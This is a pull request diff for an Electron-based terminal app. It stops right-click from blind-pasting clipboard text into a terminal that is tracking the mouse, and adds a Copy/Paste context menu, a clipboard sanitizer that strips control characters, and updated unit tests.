### PR TITLE
fix(terminal): right-click must never blind-paste into a mouse-mode terminal

### DIFF
--- a/src/main/providers/claude/spawn.ts
+++ b/src/main/providers/claude/spawn.ts
@@ -82,24 +82,18 @@ export function buildClaudeLocalSpawn(opts: SpawnOptions): { cmd: string; args: 
   // than a secret sitting in ConsoleHost_history.txt forever.
   if (opts.shellOnly && opts.terminalSecret) env.CCC_ARG_SECRET = opts.terminalSecret
 
-  const shell = os.platform() === 'win32' ? 'powershell.exe' : (process.env.SHELL || '/bin/bash')
-  // POSIX: spawn a LOGIN shell (-l) so PATH picks up Homebrew/nvm/npm-global
-  // entries from ~/.zprofile. A Finder/Dock-launched app inherits launchd's
-  // minimal PATH, and a non-login zsh never sources ~/.zprofile, so without
-  // this every session hits "command not found: claude" while the onboarding
-  // check (which already uses -l, see index.ts cli:check) passes.
-  const shellArgs = os.platform() === 'win32' ? [] : ['-l']
+  // Protective CLAUDE_* env, stamped for EVERY local session kind — including
+  // shell-only and elevated shells, which used to be exempt. The vars are inert
+  // for the shell itself; they only matter if a `claude` starts inside the
+  // session. And a shell-only session is exactly where users DO start one by
+  // hand — the account re-auth flow drops them at a prompt to run `claude
+  // /login`. The old exemption meant that hand-run claude kept mouse tracking:
+  // xterm's selection service was disabled, so right-click (which assumes "no
+  // selection ⇒ paste") pasted the clipboard into the PTY — at a PowerShell
+  // prompt that EXECUTES whatever was on the clipboard — and the forwarded
+  // right-button report hit CC's login screen as a click.
 
-  if (opts.shellOnly && opts.elevated) {
-    const cmd = os.platform() === 'win32' ? 'gsudo' : 'sudo'
-    return { cmd, args: [shell, ...shellArgs], env }
-  }
-
-  if (opts.shellOnly) {
-    return { cmd: shell, args: shellArgs, env }
-  }
-
-  // Claude session: disable CC's mouse mode + alternate screen when classic copy/paste is
+  // Disable CC's mouse mode + alternate screen when classic copy/paste is
   // on (default true). Disabling mouse lets xterm own the mouse → classic text selection
   // + right-click copy/paste work the standard terminal way. Disabling the alternate screen
   // forces CC to use the inline renderer so conversation output stays in the terminal's
@@ -127,6 +121,23 @@ export function buildClaudeLocalSpawn(opts: SpawnOptions): { cmd: string; args: 
   // the feature so no keystroke can background a session. Set false to restore it.
   if (opts.disableBackgroundTasks !== false) {
     env.CLAUDE_CODE_DISABLE_BACKGROUND_TASKS = '1'
+  }
+
+  const shell = os.platform() === 'win32' ? 'powershell.exe' : (process.env.SHELL || '/bin/bash')
+  // POSIX: spawn a LOGIN shell (-l) so PATH picks up Homebrew/nvm/npm-global
+  // entries from ~/.zprofile. A Finder/Dock-launched app inherits launchd's
+  // minimal PATH, and a non-login zsh never sources ~/.zprofile, so without
+  // this every session hits "command not found: claude" while the onboarding
+  // check (which already uses -l, see index.ts cli:check) passes.
+  const shellArgs = os.platform() === 'win32' ? [] : ['-l']
+
+  if (opts.shellOnly && opts.elevated) {
+    const cmd = os.platform() === 'win32' ? 'gsudo' : 'sudo'
+    return { cmd, args: [shell, ...shellArgs], env }
+  }
+
+  if (opts.shellOnly) {
+    return { cmd: shell, args: shellArgs, env }
   }
 
   // Claude session: spawn shell only; pty-manager writes the cd+claude command into the shell post-spawn.

--- a/src/main/providers/types.ts
+++ b/src/main/providers/types.ts
@@ -23,9 +23,12 @@ export interface SpawnOptions {
   disableAutoMemory?: boolean
   model?: string
   /** v1.5.32: when true (or undefined = default), sets CLAUDE_CODE_DISABLE_MOUSE=1
-   *  in the Claude spawn env so xterm owns the mouse (classic selection, right-click
-   *  copy/paste). When false, CC's mouse mode is preserved. Shell-only sessions
-   *  are never affected regardless of this flag. */
+   *  in the spawn env so xterm owns the mouse (classic selection, right-click
+   *  copy/paste). When false, CC's mouse mode is preserved. Applies to shell-only
+   *  sessions too: the var is inert for the shell itself but governs any `claude`
+   *  the user starts by hand (the re-auth flow does exactly that), so exempting
+   *  them left that claude in mouse mode where right-click pasted — and at a
+   *  shell prompt executed — the clipboard. */
   classicTerminalCopyPaste?: boolean
   /** v2.0: CC >= 2.1.195 renders question options as CLICKABLE targets, which
    *  misfire inside xterm.js. False (or undefined = CCC default) stamps

--- a/src/renderer/components/TerminalContextMenu.tsx
+++ b/src/renderer/components/TerminalContextMenu.tsx
@@ -1,0 +1,92 @@
+import React, { useEffect, useLayoutEffect, useRef } from 'react'
+
+// Explicit right-click menu for terminals — the fail-safe half of the
+// right-click fix. It appears exactly when a blind action would be wrong:
+// while a mouse-tracking program owns the mouse (xterm's selection service is
+// off, so "no selection" proves nothing about the user's intent), when classic
+// copy/paste is disabled (the old code blind-pasted on a false copy-on-select
+// premise), or when a blind classic paste would submit multi-line clipboard at
+// a raw prompt. Copy/Paste here are explicit clicks, so nothing reaches the
+// PTY unasked.
+interface Props {
+  x: number
+  y: number
+  hasSelection: boolean
+  onCopy: () => void
+  onPaste: () => void
+  onClose: () => void
+}
+
+export default function TerminalContextMenu({ x, y, hasSelection, onCopy, onPaste, onClose }: Props) {
+  const menuRef = useRef<HTMLDivElement>(null)
+
+  // Clamp into the viewport after first paint (below-right of the pointer when
+  // it fits; flipped/pinned otherwise). Rendered transparent until positioned.
+  useLayoutEffect(() => {
+    const el = menuRef.current
+    if (!el) return
+    const rect = el.getBoundingClientRect()
+    let left = x
+    let top = y
+    if (left + rect.width > window.innerWidth - 4) left = window.innerWidth - rect.width - 4
+    if (top + rect.height > window.innerHeight - 4) top = y - rect.height - 4
+    if (left < 4) left = 4
+    if (top < 4) top = 4
+    el.style.left = `${left}px`
+    el.style.top = `${top}px`
+    el.style.opacity = '1'
+  }, [x, y])
+
+  // Escape dismisses. Capture phase + stopPropagation so a modal / keybinding
+  // behind the menu does not also act on the same keystroke.
+  useEffect(() => {
+    const onKey = (e: KeyboardEvent) => {
+      if (e.key !== 'Escape') return
+      e.stopPropagation()
+      e.preventDefault()
+      onClose()
+    }
+    document.addEventListener('keydown', onKey, true)
+    return () => document.removeEventListener('keydown', onKey, true)
+  }, [onClose])
+
+  const itemClass =
+    'w-full flex items-center justify-between gap-6 px-3 py-1.5 text-xs text-text text-left ' +
+    'hover:bg-surface0 disabled:opacity-40 disabled:cursor-not-allowed disabled:hover:bg-transparent'
+
+  return (
+    // mousedown (not click) so the dismiss cannot be triggered by a synthetic
+    // click event, and so the menu is gone before any mouseup reaches xterm.
+    <div
+      className="fixed inset-0 z-50"
+      onMouseDown={onClose}
+      onContextMenu={(e) => {
+        e.preventDefault()
+        e.stopPropagation()
+        onClose()
+      }}
+    >
+      <div
+        ref={menuRef}
+        className="fixed bg-mantle border border-surface0 rounded-lg shadow-xl py-1 w-56"
+        style={{ left: x, top: y, opacity: 0 }}
+        onMouseDown={(e) => e.stopPropagation()}
+      >
+        <button type="button" className={itemClass} onClick={onCopy} disabled={!hasSelection}>
+          <span>Copy</span>
+          <span className="text-overlay0">Ctrl+Shift+C</span>
+        </button>
+        {!hasSelection && (
+          <div className="px-3 pb-1.5 pt-0.5 text-[10px] leading-snug text-overlay0">
+            To copy, select text first — hold Shift while dragging if the app is
+            tracking the mouse (full-screen apps like Claude Code&apos;s login).
+          </div>
+        )}
+        <button type="button" className={itemClass} onClick={onPaste}>
+          <span>Paste</span>
+          <span className="text-overlay0">Ctrl+V</span>
+        </button>
+      </div>
+    </div>
+  )
+}

--- a/src/renderer/components/TerminalView.tsx
+++ b/src/renderer/components/TerminalView.tsx
@@ -14,7 +14,8 @@ import SshFlowOverlay from './SshFlowOverlay'
 import { shouldUseResumePicker } from '../utils/resumePicker'
 import { shouldGateAccountChoice, formatSpawnError } from '../utils/sessionLaunch'
 import { stripCursorSequences } from '../utils/terminalFormatting'
-import { isControlReportOnly, decideContextMenuAction, isOrdinaryEditable } from '../utils/terminalInput'
+import { isControlReportOnly, decideContextMenuAction, blindPasteNeedsMenu, isOrdinaryEditable } from '../utils/terminalInput'
+import TerminalContextMenu from './TerminalContextMenu'
 import { decideFollow } from '../utils/terminalScroll'
 import { getTerminalTheme } from './terminal/terminalTheme'
 import { installTerminalKeybindings } from './terminal/terminalKeybindings'
@@ -32,6 +33,21 @@ import type { ProviderId, CodexOptions, TerminalOptions } from '../../shared/typ
 
 // Re-export for consumers
 export { killSessionPty } from '../ptyTracker'
+
+// Main-process clipboard read first (focus-independent, retried for Windows
+// delayed-render), renderer API as a fallback if IPC is unavailable. Shared by
+// the keybinding paste, the classic right-click paste, and the context menu.
+async function readClipboardText(): Promise<string> {
+  try {
+    const viaMain = await window.electronAPI.clipboard.readText()
+    if (viaMain) return viaMain
+  } catch { /* fall through */ }
+  try {
+    return await navigator.clipboard.readText()
+  } catch {
+    return ''
+  }
+}
 
 interface Props {
   sessionId: string
@@ -94,6 +110,9 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
   // Whether #145 input diagnostics are on, readable from the init effect's
   // long-lived onData closure.
   const inputDiagRef = useRef(false)
+  // Explicit right-click menu (Copy/Paste). Opened by the contextmenu handler
+  // whenever a blind copy-or-paste decision would be unsafe; null = closed.
+  const [ctxMenu, setCtxMenu] = useState<{ x: number; y: number; hasSelection: boolean } | null>(null)
   const updateSession = useSessionStore((s) => s.updateSession)
   const session = useSessionStore((s) => s.sessions.find((sess) => sess.id === sessionId))
 
@@ -821,17 +840,7 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
         isActive: () => isActiveRef.current,
         // Main-process clipboard read: focus-independent and retried for Windows
         // delayed-render, with the renderer API as a fallback if IPC is unavailable.
-        readText: async () => {
-          try {
-            const viaMain = await window.electronAPI.clipboard.readText()
-            if (viaMain) return viaMain
-          } catch { /* fall through */ }
-          try {
-            return await navigator.clipboard.readText()
-          } catch {
-            return ''
-          }
-        },
+        readText: readClipboardText,
         writeText: (text) => navigator.clipboard.writeText(text),
         // Never fail silently — a silent no-op is what let #145 go unnoticed.
         onNothingToPaste: () => {
@@ -840,21 +849,25 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
       })
 
 
-      // Right-click: context-aware copy or paste depending on mode.
+      // Right-click: copy the selection, paste, or open the explicit menu.
       //
-      // Classic mode (classicTerminalCopyPaste, the default): CC's mouse
-      // tracking is disabled so xterm owns selection. Right-click copies
-      // the current selection when text is selected, or pastes from the
-      // clipboard when nothing is selected. Route paste through xterm's
-      // paste() so bracketed-paste mode (\x1b[200~...\x1b[201~) is respected.
-      //
-      // Non-classic mode: CC's copy-on-select already copied text on
-      // mouse-up, so right-click always pastes (never re-copies).
+      // The decision lives in decideContextMenuAction. The load-bearing input
+      // is term.modes.mouseTrackingMode: while a program tracks the mouse,
+      // xterm disables its selection service, so "no selection" is guaranteed
+      // and MUST NOT be read as "paste, a copy already happened" — that
+      // reading fed the clipboard into the PTY (and, at a shell prompt,
+      // executed it). Blind paste survives only in its classic-mode home (no
+      // tracking, nothing selected, single-line or bracketed-paste target);
+      // everything ambiguous opens TerminalContextMenu, where Copy and Paste
+      // are explicit clicks. Paste routes through xterm's paste() so
+      // bracketed-paste mode (\x1b[200~...\x1b[201~) is respected.
       handleContextMenu = async (e: MouseEvent) => {
         e.preventDefault()
         e.stopPropagation()
         const classicMode = useSettingsStore.getState().settings.classicTerminalCopyPaste !== false
-        const action = decideContextMenuAction(!!term?.getSelection(), classicMode)
+        const mouseTracking = (term?.modes.mouseTrackingMode ?? 'none') !== 'none'
+        const hasSelection = !!term?.getSelection()
+        const action = decideContextMenuAction({ hasSelection, classicMode, mouseTracking })
         if (action === 'copy') {
           const sel = term?.getSelection()
           if (sel) {
@@ -867,14 +880,24 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
           }
           return
         }
-        // action === 'paste'
-        try {
-          const text = await navigator.clipboard.readText()
-          if (!text) return
+        if (action === 'paste') {
+          const text = await readClipboardText()
+          if (!text) {
+            // Never fail silently — a silent no-op is what let #145 go unnoticed.
+            usePasteHintStore.getState().show(sessionId, 'Nothing to paste — clipboard has no text')
+            return
+          }
+          if (blindPasteNeedsMenu(text, !!term?.modes.bracketedPasteMode)) {
+            // Multi-line into a non-bracketed prompt submits line-by-line;
+            // require the explicit menu click instead of pasting blind.
+            setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection })
+            return
+          }
           term?.paste(text)
-        } catch {
-          // clipboard access denied (insecure context / not focused)
+          return
         }
+        // action === 'menu'
+        setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection })
       }
       container.addEventListener('contextmenu', handleContextMenu, true)
     }
@@ -912,6 +935,38 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
 
   const needsAttention = session?.needsAttention ?? false
   const needsLogin = session?.needsLogin ?? false
+
+  // Context-menu actions. Close first so the menu is gone before any async
+  // clipboard work; refocus the terminal so the user can keep typing.
+  const closeCtxMenu = () => {
+    setCtxMenu(null)
+    terminalRef.current?.focus()
+  }
+  const ctxMenuCopy = async () => {
+    const term = terminalRef.current
+    setCtxMenu(null)
+    const sel = term?.getSelection()
+    if (sel) {
+      try {
+        await navigator.clipboard.writeText(sel)
+        term?.clearSelection()
+      } catch {
+        // clipboard write denied (insecure context / not focused)
+      }
+    }
+    term?.focus()
+  }
+  const ctxMenuPaste = async () => {
+    const term = terminalRef.current
+    setCtxMenu(null)
+    const text = await readClipboardText()
+    if (!text) {
+      usePasteHintStore.getState().show(sessionId, 'Nothing to paste — clipboard has no text')
+    } else {
+      term?.paste(text)
+    }
+    term?.focus()
+  }
 
   return (
     <div className="flex-1 flex flex-col titlebar-no-drag overflow-hidden relative" style={{ minHeight: 0 }}>
@@ -954,6 +1009,16 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
             isScrolledUpRef.current = false
             setIsScrolledUp(false)
           }}
+        />
+      )}
+      {ctxMenu && (
+        <TerminalContextMenu
+          x={ctxMenu.x}
+          y={ctxMenu.y}
+          hasSelection={ctxMenu.hasSelection}
+          onCopy={ctxMenuCopy}
+          onPaste={ctxMenuPaste}
+          onClose={closeCtxMenu}
         />
       )}
     </div>

--- a/src/renderer/components/TerminalView.tsx
+++ b/src/renderer/components/TerminalView.tsx
@@ -14,7 +14,7 @@ import SshFlowOverlay from './SshFlowOverlay'
 import { shouldUseResumePicker } from '../utils/resumePicker'
 import { shouldGateAccountChoice, formatSpawnError } from '../utils/sessionLaunch'
 import { stripCursorSequences } from '../utils/terminalFormatting'
-import { isControlReportOnly, decideContextMenuAction, blindPasteNeedsMenu, isOrdinaryEditable } from '../utils/terminalInput'
+import { isControlReportOnly, resolveContextMenuIntent, blindPasteNeedsMenu, sanitizeClipboardForPaste, isOrdinaryEditable } from '../utils/terminalInput'
 import TerminalContextMenu from './TerminalContextMenu'
 import { decideFollow } from '../utils/terminalScroll'
 import { getTerminalTheme } from './terminal/terminalTheme'
@@ -36,17 +36,23 @@ export { killSessionPty } from '../ptyTracker'
 
 // Main-process clipboard read first (focus-independent, retried for Windows
 // delayed-render), renderer API as a fallback if IPC is unavailable. Shared by
-// the keybinding paste, the classic right-click paste, and the context menu.
+// the keybinding paste, the classic right-click paste, and the context menu — so
+// sanitizeClipboardForPaste here is the single chokepoint that strips paste-mode
+// breakout sequences and readline-submitting controls out of EVERY paste route
+// before the text can reach term.paste() and the PTY.
 async function readClipboardText(): Promise<string> {
+  let raw = ''
   try {
-    const viaMain = await window.electronAPI.clipboard.readText()
-    if (viaMain) return viaMain
+    raw = (await window.electronAPI.clipboard.readText()) || ''
   } catch { /* fall through */ }
-  try {
-    return await navigator.clipboard.readText()
-  } catch {
-    return ''
+  if (!raw) {
+    try {
+      raw = await navigator.clipboard.readText()
+    } catch {
+      raw = ''
+    }
   }
+  return sanitizeClipboardForPaste(raw)
 }
 
 interface Props {
@@ -113,6 +119,15 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
   // Explicit right-click menu (Copy/Paste). Opened by the contextmenu handler
   // whenever a blind copy-or-paste decision would be unsafe; null = closed.
   const [ctxMenu, setCtxMenu] = useState<{ x: number; y: number; hasSelection: boolean } | null>(null)
+  // Close the menu the instant this tab is deactivated. Every TerminalView stays
+  // mounted (App renders inactive ones display:none), and the menu arms a
+  // document-level capture Escape listener — a menu left open in a hidden session
+  // would swallow the ACTIVE session's Escape (a missed Claude interrupt) and
+  // reappear as a ghost on tab-back. A keyboard tab-switch never fires the
+  // backdrop's mousedown-close, so it must be closed here.
+  useEffect(() => {
+    if (!isActive) setCtxMenu(null)
+  }, [isActive])
   const updateSession = useSessionStore((s) => s.updateSession)
   const session = useSessionStore((s) => s.sessions.find((sess) => sess.id === sessionId))
 
@@ -864,16 +879,15 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
       handleContextMenu = async (e: MouseEvent) => {
         e.preventDefault()
         e.stopPropagation()
+        if (!term) return
         const classicMode = useSettingsStore.getState().settings.classicTerminalCopyPaste !== false
-        const mouseTracking = (term?.modes.mouseTrackingMode ?? 'none') !== 'none'
-        const hasSelection = !!term?.getSelection()
-        const action = decideContextMenuAction({ hasSelection, classicMode, mouseTracking })
+        const { action, bracketedPaste } = resolveContextMenuIntent(term, classicMode)
         if (action === 'copy') {
-          const sel = term?.getSelection()
+          const sel = term.getSelection()
           if (sel) {
             try {
               await navigator.clipboard.writeText(sel)
-              term?.clearSelection()
+              term.clearSelection()
             } catch {
               // clipboard write denied (insecure context / not focused)
             }
@@ -887,17 +901,21 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
             usePasteHintStore.getState().show(sessionId, 'Nothing to paste — clipboard has no text')
             return
           }
-          if (blindPasteNeedsMenu(text, !!term?.modes.bracketedPasteMode)) {
-            // Multi-line into a non-bracketed prompt submits line-by-line;
-            // require the explicit menu click instead of pasting blind.
-            setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection })
+          // Re-sample tracking AFTER the (retried, possibly slow) clipboard read:
+          // a program that started tracking the mouse during the await must open
+          // the menu, not receive a decision taken while it was still a prompt.
+          const trackingNow = (term.modes?.mouseTrackingMode ?? 'none') !== 'none'
+          if (trackingNow || blindPasteNeedsMenu(text, bracketedPaste)) {
+            // Ambiguous now, or multi-line into a non-bracketed prompt (which
+            // submits line-by-line) — require the explicit menu click.
+            setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection: !!term.getSelection() })
             return
           }
-          term?.paste(text)
+          term.paste(text)
           return
         }
         // action === 'menu'
-        setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection })
+        setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection: !!term.getSelection() })
       }
       container.addEventListener('contextmenu', handleContextMenu, true)
     }
@@ -943,23 +961,25 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
     terminalRef.current?.focus()
   }
   const ctxMenuCopy = async () => {
-    const term = terminalRef.current
+    const sel = terminalRef.current?.getSelection()
     setCtxMenu(null)
-    const sel = term?.getSelection()
     if (sel) {
       try {
         await navigator.clipboard.writeText(sel)
-        term?.clearSelection()
       } catch {
         // clipboard write denied (insecure context / not focused)
       }
     }
-    term?.focus()
+    // Re-read the ref AFTER the await: the session can be disposed mid-await,
+    // which nulls terminalRef — pasting/clearing into a captured-but-disposed
+    // Terminal would throw.
+    terminalRef.current?.clearSelection()
+    terminalRef.current?.focus()
   }
   const ctxMenuPaste = async () => {
-    const term = terminalRef.current
     setCtxMenu(null)
     const text = await readClipboardText()
+    const term = terminalRef.current // re-read post-await; may be null if disposed
     if (!text) {
       usePasteHintStore.getState().show(sessionId, 'Nothing to paste — clipboard has no text')
     } else {

--- a/src/renderer/utils/terminalInput.ts
+++ b/src/renderer/utils/terminalInput.ts
@@ -48,19 +48,76 @@ export function decideContextMenuAction(opts: {
   return opts.classicMode ? 'paste' : 'menu'
 }
 
+// Strip the control characters that let pasted clipboard text ESCAPE the paste
+// and run as typed input. This is the primary defence and must wrap EVERY paste
+// into a terminal (blind right-click, the context menu, and the Ctrl+V
+// keybinding all read through here).
+//
+// Two vectors, both closed by removing C0 controls:
+//   - Bracketed-paste breakout. term.paste() wraps the text in
+//     \x1b[200~ ... \x1b[201~ but does NOT strip an embedded end marker, so a
+//     clipboard containing a literal \x1b[201~ terminates the wrap early and the
+//     bytes after it run as commands — a right-click RCE from a crafted "copy
+//     this command" affordance, even at a bracketed-paste prompt. Removing ESC
+//     removes the sentinel.
+//   - readline accept-line bindings. \x0f (Ctrl-O, operate-and-get-next) and
+//     other C0 controls submit the current line with no newline in sight, so a
+//     newline check alone (blindPasteNeedsMenu) cannot see them.
+//
+// We keep \t and the newline pair \r/\n: newlines must survive so bracketed
+// inputs keep multi-line pastes and blindPasteNeedsMenu can still gate them, and
+// tab survives for indented pastes. This mirrors how hardened terminals (iTerm2,
+// Windows Terminal) sanitise paste input. DEL (\x7f) is stripped too.
+export function sanitizeClipboardForPaste(text: string): string {
+  // eslint-disable-next-line no-control-regex
+  return text.replace(/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/g, '')
+}
+
 // Should a BLIND paste (classic right-click with nothing selected — the only
 // paste the user did not explicitly pick from a menu) be routed through the
 // context menu for confirmation instead?
 //
-// The hazard is precise: term.paste() normalises \n to \r, so clipboard text
-// containing any newline submits line-by-line at a raw shell prompt — one
-// right-click executes the clipboard. When the foreground program has turned
-// bracketed paste on (CC's input, modern shells' line editors), the paste
-// arrives wrapped in \x1b[200~ ... \x1b[201~ and newlines are literal, so
-// multi-line pastes there are routine and safe — no confirmation.
+// The hazard: term.paste() normalises \n to \r, so clipboard text containing any
+// newline submits line-by-line at a raw shell prompt — one right-click executes
+// the clipboard. When the foreground program has turned bracketed paste on (CC's
+// input, modern shells' line editors), the paste arrives wrapped in
+// \x1b[200~ ... \x1b[201~ and newlines are literal, so multi-line pastes there
+// are routine — no confirmation. (The crafted-escape breakout that would defeat
+// that wrap is handled separately and unconditionally by
+// sanitizeClipboardForPaste, so `text` here is already free of ESC/C0.)
+//
+// Residual, accepted: xterm never auto-resets DEC mode 2004, so if a TUI enables
+// bracketed paste and dies without emitting \x1b[?2004l, bracketedPasteActive can
+// read stale-true at a genuinely non-bracketed prompt and an ordinary multi-line
+// paste would submit line-by-line. Post-sanitise it can only be benign clipboard
+// text (no injected commands), and the far commoner path — Ctrl+V — never gated
+// on this at all; tightening it further would gate the most common paste in the
+// app (a multi-line prompt into Claude Code's input).
 export function blindPasteNeedsMenu(text: string, bracketedPasteActive: boolean): boolean {
   if (bracketedPasteActive) return false
   return /[\r\n]/.test(text)
+}
+
+// Resolve what a right-click should do from the terminal's LIVE modes. Extracted
+// from TerminalView so the glue — reading term.modes and mapping it into
+// decideContextMenuAction's inputs — is unit-testable and mutation-catchable. The
+// #145 post-mortem is explicit that predicate tests cannot see wiring bugs; a
+// one-character flip of the mouseTracking compare silently resurrects the
+// blind-paste-at-a-TUI defect, so the compare lives here, behind a test.
+export function resolveContextMenuIntent(
+  term: {
+    getSelection: () => string
+    modes?: { mouseTrackingMode?: string; bracketedPasteMode?: boolean }
+  },
+  classicMode: boolean,
+): { action: 'copy' | 'paste' | 'menu'; mouseTracking: boolean; bracketedPaste: boolean } {
+  const mouseTracking = (term.modes?.mouseTrackingMode ?? 'none') !== 'none'
+  const hasSelection = !!term.getSelection()
+  return {
+    action: decideContextMenuAction({ hasSelection, classicMode, mouseTracking }),
+    mouseTracking,
+    bracketedPaste: !!term.modes?.bracketedPasteMode,
+  }
 }
 
 // Is this keystroke a terminal paste request? Ctrl+V (Win/Linux), Cmd+V (macOS),

--- a/src/renderer/utils/terminalInput.ts
+++ b/src/renderer/utils/terminalInput.ts
@@ -13,22 +13,54 @@ export function isControlReportOnly(data: string): boolean {
 
 // Decides what a right-click contextmenu event should do in a terminal.
 //
-// classicMode (classicTerminalCopyPaste === true, the default):
-//   CC's mouse tracking is disabled (CLAUDE_CODE_DISABLE_MOUSE=1), so xterm
-//   owns the mouse and copy-on-select is OFF. Right-click should therefore:
-//     - COPY  when text is selected (the user just selected something to copy)
-//     - PASTE when nothing is selected (the user wants to paste from clipboard)
+// The old two-way version of this ('copy' | 'paste') was built on a premise
+// that is FALSE inside CCC: "when there is no selection, a copy already
+// happened on mouse-up (CC's copy-on-select)". A TUI can only reach the system
+// clipboard through OSC 52, and CCC's xterm registers no OSC 52 handler and
+// loads no ClipboardAddon — so nothing a TUI does ever copies. Worse, while a
+// program has MOUSE TRACKING on (CC with classic off, vim, htop, a hand-run
+// claude), xterm disables its selection service entirely, so hasSelection is
+// always false and "no selection ⇒ paste" fired on every right-click — feeding
+// the clipboard straight into the PTY, where a newline at a shell prompt
+// EXECUTES it.
 //
-// non-classic mode (classicTerminalCopyPaste === false):
-//   CC's copy-on-select is active — text is already copied the moment the
-//   mouse button is released. Right-click must therefore ALWAYS paste;
-//   re-copying on right-click would overwrite whatever the user wanted to
-//   paste with text they already have.
-export function decideContextMenuAction(hasSelection: boolean, classicMode: boolean): 'copy' | 'paste' {
-  if (classicMode) {
-    return hasSelection ? 'copy' : 'paste'
-  }
-  return 'paste'
+// The rules, in order:
+//   - a visible selection is an unambiguous copy request → COPY. (While mouse
+//     tracking is on, a selection can only exist via Shift+drag — xterm's
+//     deliberate override — so it is still unambiguous.)
+//   - no selection + mouse tracking on → MENU. Never blind-paste at a TUI:
+//     the user cannot see what a paste would do, and the click was probably an
+//     attempted copy that xterm's disabled selection turned into "no selection".
+//   - no selection + no tracking + classicMode → PASTE, the PuTTY behaviour the
+//     setting promises (classicTerminalCopyPaste, default on).
+//   - no selection + no tracking + non-classic → MENU. The old "always paste"
+//     rested entirely on the false copy-on-select premise; an explicit menu
+//     pastes one click later and can never execute something unasked.
+//
+// 'menu' = show the terminal context menu with explicit Copy / Paste items.
+export function decideContextMenuAction(opts: {
+  hasSelection: boolean
+  classicMode: boolean
+  mouseTracking: boolean
+}): 'copy' | 'paste' | 'menu' {
+  if (opts.hasSelection) return 'copy'
+  if (opts.mouseTracking) return 'menu'
+  return opts.classicMode ? 'paste' : 'menu'
+}
+
+// Should a BLIND paste (classic right-click with nothing selected — the only
+// paste the user did not explicitly pick from a menu) be routed through the
+// context menu for confirmation instead?
+//
+// The hazard is precise: term.paste() normalises \n to \r, so clipboard text
+// containing any newline submits line-by-line at a raw shell prompt — one
+// right-click executes the clipboard. When the foreground program has turned
+// bracketed paste on (CC's input, modern shells' line editors), the paste
+// arrives wrapped in \x1b[200~ ... \x1b[201~ and newlines are literal, so
+// multi-line pastes there are routine and safe — no confirmation.
+export function blindPasteNeedsMenu(text: string, bracketedPasteActive: boolean): boolean {
+  if (bracketedPasteActive) return false
+  return /[\r\n]/.test(text)
 }
 
 // Is this keystroke a terminal paste request? Ctrl+V (Win/Linux), Cmd+V (macOS),

--- a/tests/unit/main/classic-mouse-env.test.ts
+++ b/tests/unit/main/classic-mouse-env.test.ts
@@ -5,7 +5,12 @@
  * Contract:
  *   - classic on (true or undefined = default) → BOTH vars set to '1'.
  *   - classic off (false) → NEITHER var is set (by this function).
- *   - shell-only sessions → NEITHER var is set, regardless of classicTerminalCopyPaste.
+ *   - shell-only sessions (elevated included) follow the SAME rule as Claude
+ *     sessions. The old exemption ("shell-only → never set") pinned a live
+ *     defect: the vars only matter to a `claude` process, and shell-only
+ *     sessions are where users start one by hand (the re-auth flow's /login
+ *     prompt) — that claude kept mouse tracking, so right-click pasted (and at
+ *     a shell prompt executed) the clipboard instead of copying.
  *
  * We use vi.stubEnv to ensure the host environment's own CLAUDE_CODE_DISABLE_MOUSE
  * value (which may be set on the developer machine) does not interfere with the
@@ -54,21 +59,27 @@ describe('buildClaudeLocalSpawn — classic copy/paste env vars', () => {
     expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBeUndefined()
   })
 
-  it('shell-only: NEITHER var is set (classic default)', () => {
+  it('shell-only: BOTH vars are set (classic default) — hand-run claude must not keep mouse tracking', () => {
     const { env } = buildClaudeLocalSpawn({ ...BASE, shellOnly: true })
-    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBeUndefined()
-    expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBeUndefined()
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBe('1')
+    expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBe('1')
   })
 
-  it('shell-only: NEITHER var is set even when classicTerminalCopyPaste is true', () => {
+  it('shell-only: BOTH vars are set when classicTerminalCopyPaste is true', () => {
     const { env } = buildClaudeLocalSpawn({ ...BASE, shellOnly: true, classicTerminalCopyPaste: true })
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBe('1')
+    expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBe('1')
+  })
+
+  it('shell-only: classic off (false) still sets NEITHER var', () => {
+    const { env } = buildClaudeLocalSpawn({ ...BASE, shellOnly: true, classicTerminalCopyPaste: false })
     expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBeUndefined()
     expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBeUndefined()
   })
 
-  it('shell-only elevated: NEITHER var is set', () => {
+  it('shell-only elevated: BOTH vars are set', () => {
     const { env } = buildClaudeLocalSpawn({ ...BASE, shellOnly: true, elevated: true })
-    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBeUndefined()
-    expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBeUndefined()
+    expect(env.CLAUDE_CODE_DISABLE_MOUSE).toBe('1')
+    expect(env.CLAUDE_CODE_DISABLE_ALTERNATE_SCREEN).toBe('1')
   })
 })

--- a/tests/unit/providers/claude/classic-mouse-env.test.ts
+++ b/tests/unit/providers/claude/classic-mouse-env.test.ts
@@ -7,8 +7,14 @@
  *
  * When false the var must be absent so CC's mouse mode is preserved.
  *
- * SSH and shell-only sessions are handled separately (SSH goes through a
- * different path; shell-only receives no CLAUDE env vars in buildClaudeLocalSpawn).
